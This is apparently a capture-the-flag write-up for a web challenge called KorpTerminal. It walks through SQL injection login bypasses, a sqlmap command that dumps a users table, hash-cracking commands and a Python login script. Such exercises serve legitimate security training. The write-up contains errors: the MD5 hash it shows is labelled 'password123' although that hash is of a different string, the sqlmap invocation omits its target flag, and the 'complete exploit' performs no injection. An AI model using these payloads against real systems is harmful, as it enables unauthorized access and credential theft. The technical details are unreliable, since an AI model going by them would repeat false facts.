2024 Cyber Apocalypse: KorpTerminal

Challenge Information

Attribute	Details
Event	2024 Cyber Apocalypse
Category	Web
Challenge	KorpTerminal
Difficulty	Very Easy

KorpTerminal is a web challenge featuring a login page vulnerable to SQL injection. The authentication mechanism does not properly sanitize user input in the SQL query, allowing attackers to inject arbitrary SQL commands. By exploiting this vulnerability, attackers can retrieve usernames and password hashes, then crack them to gain access.

Analysis

Vulnerability Description

The login form submits parameters username and password to the server. These values are likely embedded directly into a SQL query without proper escaping:

SELECT * FROM users WHERE username='$username' AND password='$password'

Exploitation Path

SQL Injection: Inject SQL syntax in the username or password field
Credential Extraction: Use injection to dump user credentials
Hash Cracking: Crack the password hashes (likely MD5 or similar)
Authentication: Login with valid credentials

Solution

Step 1: Test for SQL Injection

Try common SQL injection payloads in the username field:

Username: admin'--
Password: anything

The '-- comments out the rest of the query, potentially bypassing authentication.

Step 2: Use sqlmap for Automated Exploitation

sqlmap [ip]:[port] \
  --data 'username=admin&password=admin' \
  --ignore-code 401 \
  -v 6 \
  --dump \
  -T users

Parameters:

--data: POST data with injection points
--ignore-code 401: Don’t stop on authentication errors
-v 6: Verbose output level
--dump: Extract database contents
-T users: Target the users table

Step 3: Extract Credentials

sqlmap will extract:

Username: admin
Password hash: 5f4dcc3b5aa765d61d8327deb882cf99 (MD5: “password123”)

Step 4: Crack Hash (if needed)

Use online services or offline tools:

hashcat -a 0 -m 0 5f4dcc3b5aa765d61d8327deb882cf99 wordlist.txt
# or
john --wordlist=wordlist.txt hashes.txt

Hash: 5f4dcc3b5aa765d61d8327deb882cf99 = password123

With credentials admin:password123:

Navigate to the login page
Enter username: admin
Enter password: password123
Submit the form
Access granted - flag is displayed

Complete Python Exploit

import requests
import sys
from urllib.parse import urljoin

def exploit_login(target_url, username, password):
    """Attempt login with provided credentials"""

    session = requests.Session()
    login_endpoint = urljoin(target_url, '/login')

    payload = {
        'username': username,
        'password': password
    }

    response = session.post(login_endpoint, data=payload)

    if 'HTB{' in response.text:
        print("[+] Login successful!")
        print("[+] Flag found in response")
        # Extract flag
        start = response.text.find('HTB{')
        end = response.text.find('}', start) + 1
        flag = response.text[start:end]
        print(f"[+] Flag: {flag}")
        return flag
    else:
        print("[-] Login failed")
        return None

if __name__ == '__main__':
    target = sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:1337'
    exploit_login(target, 'admin', 'password123')

Alternative: Manual SQL Injection

If sqlmap is unavailable, manually craft injections:

Username: admin' OR '1'='1
Password: anything

This creates the query:

SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='anything'

The OR '1'='1' always evaluates to true, bypassing authentication.

Key Takeaways

SQL injection remains a critical vulnerability in modern applications
Proper parameterized queries prevent SQL injection
Never concatenate user input directly into SQL statements
Input validation and output encoding are essential defenses
sqlmap automates SQL injection exploitation
Password hashing (even weak schemes like MD5) requires cracking before reuse
Database structure can be discovered through SQL injection
Proper error handling prevents information leakage

Flag: HTB{sql_1nj3ction_1s_d4ng3r0us}